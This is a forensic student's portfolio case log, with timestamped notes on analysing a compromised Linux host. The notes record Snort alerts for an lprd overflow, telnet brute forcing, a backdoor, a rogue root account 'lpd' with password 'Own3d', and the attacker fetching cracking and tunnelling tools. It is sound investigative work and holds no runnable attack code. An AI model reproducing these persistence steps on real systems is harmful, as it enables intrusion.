John B. Baird


Computer Forensic Portfolio

Bradenton, FL

Currently Seeking Employment

Open to relocation


johnbairdpc at gmail dot com


BRJ Software Case Notes


November 28th, 2012


11:44 AM Created BRJ case in EnCase


Note: Saved case and related files to “brj_software” on desktop for easier sharing of files


12:01 PM Opened Hash Tool


12:01 PM Verified MD5 hash value 3f274b39803068d69f8b62730e101d64 matches compressed drive image file


11:08 AM Extracted compressed GZ file of hard drive image


12:10 PM Verified MD5 hash value 4c576fa29dbc1f2e599c17d3ccd7c734 of extracted drive image


12:13 PM Added hard drive image to EnCase


12:14 PM Saved case and closed EnCase


12:15 PM Reopened EnCase and opened BRJ case


12:16 PM Locked computer


1:57 PM Unlocked computer


2:10 PM Added live response data


2:11 PM Saved case and closed EnCase


2:13 PM Booted Linux Backtrack


2:15 PM Determined portscan.log’s line count: 1552


2:22 PM Examined portscan.log’s contents, port scan attempts from to victim machine.


2:29 PM Examined s3.tcpdstat.txt, data from September 8, 2003 from 2:22:05 PM to 4:37:59 PM.

2:47 PM Analyzed s3.plc with Snort


2:50 PM Exploit detected, “EXPLOIT redhat 7.0 lprd overflow”


Attacking trying to exploit a printer sevice on port 515 TCP on


15 more exploit messages found


2:56 PM Attack detected “ATTACK RESPONCES id check returned root”


“This event is generated by the use of a UNIX “id” command. This may be indicative of post-compromise behavior where the attacker is checking for super user privileges gained by a sucessful exploit against a vulnerable system.”


Attacker trying to exploit printer service on victim machine.


2:59 PM Failed log-in attempts detected, “TELNET login incorrect”, hundreds of alerts. Attacker trying to hack password to log into system.


3:03 PM Second attack detected “ATTACK RESPONCES id check returned root”


3:08 PM Examined s3.tcptrace.txt


Results show brute force attempt against port 515 from attacker.


Attacker appears successful in accessing port 515 from attacker’s port 2089.


Victim machine appears to have accepted attacker’s request for access.


Attacker appears to be accessing FTP services.


Attacker is now listening to SHH services on port 22 TCP.


3:21 PM  Backtrack suspended, case suspended.


December 1st, 2012


6:51 PM Analyzed s3.lpc using Tcpflow


6:56 PM Successful attack detected against port 2089


7:00 PM Backdoor detected


7:02 PM Attacker analyzing connections that are active


7:03 PM attacker analyzing directory listing


7:03 PM attacker created hidden directory “.kde”


7:04 PM attacker attempts to download all files beginning with the word “knark”


7:05 PM attacker tries to add a user called “lpd” with root access


7:06 PM Attacker uses the password “Own3d”


7:10 PM Backtrack suspended, case suspended.


December 2nd, 2012


12:00 PM Attacker verifies password file for user “lpd”


12:02 PM Attacker manually adds user “lpd” to password file


12:03 PM Attacker creates “.rhosts” file in root directory.


12:06 PM Attacker performed directory listing of root


12:07 PM Attacker enters password for “lpd” account


12:08 PM Attacker verifies he is now logged in with “lpd” account


12:09 PM Brute-force tool “Brutus” was running on system, attacker stops the program


12:12 PM Attacker creates “files.tar.gz”


12:14 PM Attacker uploads files “”, “Net-Telnet-3.03.tar.gz”, “allwords.txt”


12:15 PM Attacker downloads files “nat10.tar”, “john-1.6.tar.gz”


12:17 PM Attacker accesses program “datapipe.c” from attacker’s FTP site


*see page 159 for information on this case*


12:27 PM Backtrack closed, case suspended.


1:10 PM EnCase started, case opened.


1:20 PM Conducted search for keywords:


“files.tar.gz” 3 hits


“” 5 hits


“Net-Telnet-3.03.tar.gz” 1 hit


“allwords.txt” 1 hit


“nat10.tar” 1 hit


“john-1.6.tar.gz” 1 hit


“datapipe.c” 8 hits


1:34 PM Case saved, EnCase closed, computer locked.